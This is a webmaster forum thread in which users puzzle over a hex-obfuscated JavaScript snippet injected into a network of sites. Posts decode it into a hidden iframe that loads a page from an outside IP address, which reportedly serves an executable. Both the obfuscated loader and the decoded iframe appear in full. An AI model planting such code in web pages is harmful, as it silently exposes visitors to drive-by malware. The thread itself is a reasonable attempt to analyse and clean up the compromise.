Hackers injecting code into sites

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • halfpint
    GFY's Halfpint
    • Jun 2007
    • 15223

    #1

    Hackers injecting code into sites

    How do they do this and does anybody know what this script actually does, is it hijacking traffic?

    Code:
    <script> var s='3C696672616D65207372633D22687474703A2F2F3230332E3132312E36392E392F65782F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o='; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); ; o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

    Get FREE website listings on Cryptocoinshops.net
  • TheSenator
    Too lazy to set a custom title
    • Feb 2003
    • 13340

    #2
    I got my shit jacked ....but caught it early.

    It was doing some crazy pop-up that went to AFF.
    ISeekGirls.com since 2005

    Comment

    • G-Rotica
      Confirmed User
      • Aug 2005
      • 4258

      #3
      Hackers should all be shot.

      Comment

      • halfpint
        GFY's Halfpint
        • Jun 2007
        • 15223

        #4
        Originally posted by TheSenator
        I got my shit jacked ....but caught it early.

        It was doing some crazy pop-up that went to AFF.
        Did it go to an AFF affliates page or just a AFF landing page?

        Get FREE website listings on Cryptocoinshops.net

        Comment

        • StuartD
          Sofa King Band
          • Jul 2002
          • 29903

          #5
          That translates to this:

          <iframe src="http://201.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe>

          Therefore, it's loading an iframe onto your page and load the contents of that url into it.
          This is me on facebook
          This is me on twitter

          Comment

          • halfpint
            GFY's Halfpint
            • Jun 2007
            • 15223

            #6
            The funny thing with this one is Firefox did not pick it up nor did the owners own browser so he did not know until somebody else told him that it was trying to install some java application onto his browser

            Get FREE website listings on Cryptocoinshops.net

            Comment

            • halfpint
              GFY's Halfpint
              • Jun 2007
              • 15223

              #7
              Originally posted by StuartD
              That translates to this:

              <iframe src="http://201.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe>

              Therefore, it's loading an iframe onto your page and load the contents of that url into it.
              Thanks.... what a bunch of assholes they are basicaly stealing traffic then

              Get FREE website listings on Cryptocoinshops.net

              Comment

              • CurrentlySober
                Too lazy to wipe my ass
                • Aug 2002
                • 38944

                #8
                Originally posted by halfpint
                The funny thing with this one is Firefox did not pick it up nor did the owners own browser so he did not know until somebody else told him that it was trying to install some java application onto his browser
                Yeah, those things dnt effect firefox
                I think its something to do with scripts not being turned on by default in FF but they are in ie...

                However that's what i heard. Im not stating it as absolute fact


                👁️ 👍️ 💩

                Comment

                • halfpint
                  GFY's Halfpint
                  • Jun 2007
                  • 15223

                  #9
                  Originally posted by ThatGuyInTheCorner
                  Yeah, those things dnt effect firefox
                  I think its something to do with scripts not being turned on by default in FF but they are in ie...

                  However that's what i heard. Im not stating it as absolute fact
                  I know it did not come up when using Firefox but when using EI7 it picked it and gave a warning saying it wanted to install a java aplication and that it had a certificate from java saying it was verified. Wonder how many people are having this installed onto thier firefox browsers without realising it

                  Get FREE website listings on Cryptocoinshops.net

                  Comment

                  • SmokeyTheBear
                    ►SouthOfHeaven
                    • Jun 2004
                    • 28609

                    #10
                    Originally posted by ThatGuyInTheCorner
                    Yeah, those things dnt effect firefox
                    I think its something to do with scripts not being turned on by default in FF but they are in ie...

                    the script will affect firefox just the same as ie..

                    firefox comes with javascript turned on by default.

                    and even if it didn't ,surfing without javascript would be almost useless

                    so the iframe will be displayed on most browsers, whats in the iframe may only affect ie or may only affect firefox.
                    hatisblack at yahoo.com

                    Comment

                    • Quickdraw
                      Confirmed User
                      • Mar 2004
                      • 1717

                      #11
                      Originally posted by StuartD
                      That translates to this:

                      <iframe src="hxxp://201.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe>

                      Therefore, it's loading an iframe onto your page and load the contents of that url into it.
                      I think you may be 1 digit off on that ip, 203 vs. 201.

                      203.121.69.9/ex/static.php loads an executable at 203.121.69.9/ex/ex.php

                      This seems to be a popular subject today. Looks like quite a few have been hit.

                      Comment

                      • halfpint
                        GFY's Halfpint
                        • Jun 2007
                        • 15223

                        #12
                        Originally posted by Quickdraw
                        I think you may be 1 digit off on that ip, 203 vs. 201.

                        203.121.69.9/ex/static.php loads an executable at 203.121.69.9/ex/ex.php

                        This seems to be a popular subject today. Looks like quite a few have been hit.
                        It wasent just one site it was a network of sites

                        Get FREE website listings on Cryptocoinshops.net

                        Comment

                        • V_RocKs
                          Damn Right I Kiss Ass!
                          • Nov 2003
                          • 32449

                          #13
                          Keep your network secure...

                          Comment

                          • halfpint
                            GFY's Halfpint
                            • Jun 2007
                            • 15223

                            #14
                            Originally posted by V_RocKs
                            Keep your network secure...
                            Its not mine I just happened to stumble upon it while doing some link trades so I Let the webmaster know about it and am glad to say he sorted it pretty quickly and also said he was going to tighten his security.

                            I learned my lesson when they hacked my site and deleted it lol

                            Get FREE website listings on Cryptocoinshops.net

                            Comment

                            • yumma
                              Confirmed User
                              • Jul 2007
                              • 579

                              #15
                              haha, matrix has you too ;)
                              naked teens finger bang big ass babes ass fucking

                              Comment

                              • StuartD
                                Sofa King Band
                                • Jul 2002
                                • 29903

                                #16
                                Originally posted by Quickdraw
                                I think you may be 1 digit off on that ip, 203 vs. 201.

                                203.121.69.9/ex/static.php loads an executable at 203.121.69.9/ex/ex.php

                                This seems to be a popular subject today. Looks like quite a few have been hit.
                                Entirely possible. I put it into an alert to see it's output, and hand typed out what I saw, so I probably got some part of it wrong.
                                This is me on facebook
                                This is me on twitter

                                Comment

                                • Shocking
                                  Confirmed User
                                  • Feb 2006
                                  • 523

                                  #17
                                  it is actually risky to try to find out what that code do!
                                  Web Design, Programming and much more!
                                  Complete Mobile Solutions
                                  199-428-702

                                  Comment

                                  • StuartD
                                    Sofa King Band
                                    • Jul 2002
                                    • 29903

                                    #18
                                    Originally posted by Shocking
                                    it is actually risky to try to find out what that code do!
                                    Not really. Not if you know what you're doing anyway.
                                    This is me on facebook
                                    This is me on twitter

                                    Comment

                                    • ladida
                                      Confirmed User
                                      • Nov 2005
                                      • 2179

                                      #19
                                      It's funny when you get that shit replicating through the whole network from a file that acts as a shell, and it's all automated. Russians pwn at these things.
                                      agentGFY *at* gmail.com

                                      Comment

                                      Working...